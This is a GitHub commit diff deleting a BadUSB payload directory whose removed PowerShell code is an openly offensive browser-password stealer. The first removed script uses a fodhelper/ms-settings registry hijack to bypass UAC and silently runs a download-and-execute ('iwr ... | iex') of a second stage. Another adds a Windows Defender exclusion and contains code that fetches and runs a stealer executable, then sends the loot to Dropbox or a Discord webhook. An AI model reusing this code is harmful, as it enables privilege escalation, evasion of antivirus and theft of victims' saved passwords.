Delete Payloads/Flip-BrowserPasswords directory
This commit is contained in:
I-Am-Jakoby
GitHub
parent
bc64c5ef65
commit
54458903e0
3 changed files with 0 additions and 80 deletions
|
|
@ -1,14 +0,0 @@
|
|||
function s1 {
|
||||
$user = "$env:COMPUTERNAME\$env:USERNAME"
|
||||
$isAdmin = (Get-LocalGroupMember 'Administrators').Name -contains $user
|
||||
if($isAdmin){
|
||||
$fuck="powershell.exe -w h iwr https://raw.githubusercontent.com/I-Am-Jakoby/Flipper-Zero-BadUSB/main/Payloads/Flip-BrowserPasswords/s2.ps1 | iex";
|
||||
reg add "HKCU\Software\Classes\.fuck\Shell\Open\command" /d $fuck /f;reg add "HKCU\Software\Classes\ms-settings\CurVer" /d ".fuck" /f;fodhelper.exe;Start-Sleep -s 3;reg delete "HKCU\Software\Classes\.fuck\" /f;reg delete "HKCU\Software\Classes\ms-settings\" /f;
|
||||
|
||||
}
|
||||
else{
|
||||
Break
|
||||
}
|
||||
}
|
||||
|
||||
s1
|
||||
|
|
@ -1 +0,0 @@
|
|||
### THIS PAYLOAD IS NOT READY YET, DO NOT USE IT!
|
||||
|
|
@ -1,65 +0,0 @@
|
|||
<#
|
||||
function DropBox-Upload {
|
||||
|
||||
[CmdletBinding()]
|
||||
param (
|
||||
|
||||
[Parameter (Mandatory = $True, ValueFromPipeline = $True)]
|
||||
[Alias("f")]
|
||||
[string]$SourceFilePath
|
||||
)
|
||||
$outputFile = Split-Path $SourceFilePath -leaf
|
||||
$TargetFilePath="/$outputFile"
|
||||
$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
|
||||
$authorization = "Bearer " + $db
|
||||
$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
|
||||
$headers.Add("Authorization", $authorization)
|
||||
$headers.Add("Dropbox-API-Arg", $arg)
|
||||
$headers.Add("Content-Type", 'application/octet-stream')
|
||||
Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
|
||||
}
|
||||
|
||||
if (-not ([string]::IsNullOrEmpty($db))){DropBox-Upload -f $env:TMP\$FileName}
|
||||
|
||||
#------------------------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
function Upload-Discord {
|
||||
|
||||
[CmdletBinding()]
|
||||
param (
|
||||
[parameter(Position=0,Mandatory=$False)]
|
||||
[string]$file,
|
||||
[parameter(Position=1,Mandatory=$False)]
|
||||
[string]$text
|
||||
)
|
||||
|
||||
$hookurl = "$dc"
|
||||
|
||||
$Body = @{
|
||||
'username' = $env:username
|
||||
'content' = $text
|
||||
}
|
||||
|
||||
if (-not ([string]::IsNullOrEmpty($text))){
|
||||
Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)};
|
||||
|
||||
if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $hookurl}
|
||||
}
|
||||
|
||||
if (-not ([string]::IsNullOrEmpty($dc))){Upload-Discord -file $env:TMP\$FileName}
|
||||
|
||||
|
||||
#>
|
||||
# Add C:/ to exlusions so Windows Defender doesnt flag the exe we will download
|
||||
Add-MpPreference -ExclusionPath $env:tmp
|
||||
<#
|
||||
# Download the exe and save it to temp directory
|
||||
iwr "" -outfile "$env:tmp\browser.exe"
|
||||
|
||||
# Execute the Browser Stealer
|
||||
cd $env:tmp;Start-Process -FilePath "$env:tmp\browser.exe" -WindowStyle h -Wait
|
||||
|
||||
# Exfiltrate the loot to discord
|
||||
Compress-Archive -Path "$env:tmp\results" -DestinationPath $env:tmp\browserdata.zip
|
||||
Upload-Discord -file "$env:tmp\browserdata.zip"
|
||||
#>
|
||||
Loading…
Reference in a new issue